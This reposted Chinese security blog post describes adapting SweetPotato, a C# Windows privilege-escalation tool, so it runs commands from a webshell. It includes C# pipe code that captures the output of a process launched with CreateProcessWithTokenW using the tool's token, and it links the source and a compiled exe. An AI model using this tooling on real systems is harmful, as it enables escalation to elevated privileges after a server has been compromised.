SweetPotato: a version that runs commands from a webshell

admin, 2022-10-19 07:50:21 · 71 views · 1754 characters · 5 min 50 s read

Preface

A couple of days ago I saw that someone abroad had published a C# version of RottenPotato on GitHub, so I wanted to modify it into a version that can execute commands from a webshell.

I consulted @zcgonvh and @RcoIl and learned how to use pipes for communication between processes. Thanks to both for their patient guidance~

Note: reply "烂土豆" (RottenPotato) on the WeChat official account to get the compiled exe directly.

Pipes

P/Invoke declarations

```csharp
using System;
using System.Runtime.InteropServices;

// SECURITY_ATTRIBUTES: bInheritHandle = 1 makes the pipe handles inheritable,
// so the child process can use the write end as its stdout.
public struct SECURITY_ATTRIBUTES
{
    public Int32 nLength;
    public IntPtr lpSecurityDescriptor;
    public int bInheritHandle;
}

// Creates an anonymous pipe and returns its read and write handles.
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CreatePipe(ref IntPtr hReadPipe, ref IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, Int32 nSize);

// Synchronous read from the pipe's read end; lpOverlapped is always IntPtr.Zero here.
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool ReadFile(IntPtr hFile, byte[] lpBuffer, int nNumberOfBytesToRead, ref int lpNumberOfBytesRead, IntPtr lpOverlapped /* IntPtr.Zero */);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
internal static extern Boolean CloseHandle(IntPtr hObject);
```

Creating the pipe

```csharp
IntPtr out_read = IntPtr.Zero;   // read end, kept by the parent
IntPtr out_write = IntPtr.Zero;  // write end, handed to the child as its stdout

SECURITY_ATTRIBUTES saAttr = new SECURITY_ATTRIBUTES();
saAttr.nLength = Marshal.SizeOf(typeof(SECURITY_ATTRIBUTES));
saAttr.bInheritHandle = 0x1;               // the child must be able to inherit the handle
saAttr.lpSecurityDescriptor = IntPtr.Zero;

if (CreatePipe(ref out_read, ref out_write, ref saAttr, 0))  // nSize = 0: default buffer size
{
    Console.WriteLine("[+] CreatePipe success");
}
```

The new process's standard output is attached to the write end of the pipe

```csharp
// STARTUPINFO, PROCESS_INFORMATION, STARTF_USESTDHANDLES (0x100), CREATE_NO_WINDOW (0x08000000)
// and CreateProcessWithTokenW are the project's existing P/Invoke declarations;
// potatoAPI.Token, program and finalArgs are filled in elsewhere in the project.
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
si.hStdOutput = out_write;   // the child's stdout is written into the pipe
si.hStdError = err_write;    // write end of a second pipe for stderr, created the same way (not shown in this excerpt)
si.dwFlags |= STARTF_USESTDHANDLES;  // required, otherwise hStdOutput/hStdError are ignored
CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CREATE_NO_WINDOW, IntPtr.Zero, null, ref si, out pi);
```

Reading the pipe

```csharp
const int BUFSIZE = 4096;  // size of each read chunk

// Close the parent's copy of the write end first. Otherwise the pipe still has an
// open writer after the child exits, ReadFile never fails with ERROR_BROKEN_PIPE,
// and the loop below blocks forever.
CloseHandle(out_write);
byte[] buf = new byte[BUFSIZE];
int dwRead = 0;
// ReadFile returns false once every write handle is closed, i.e. when the child has exited.
while (ReadFile(out_read, buf, BUFSIZE, ref dwRead, IntPtr.Zero))
{
    byte[] outBytes = new byte[dwRead];
    Array.Copy(buf, outBytes, dwRead);
    Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
}
CloseHandle(out_read);
```

Screenshot

[Screenshot: SweetPotato executing a command from a webshell]

Source code

https://github.com/uknowsec/SweetPotato

Stars are welcome~


This article was originally published on the WeChat official account 零队 (Team Zero): SweetPotato: a version that runs commands from a webshell

Reposted by CN-SEC 中文网 (with thanks to the original author); link to this copy: https://cn-sec.com/archives/922342.html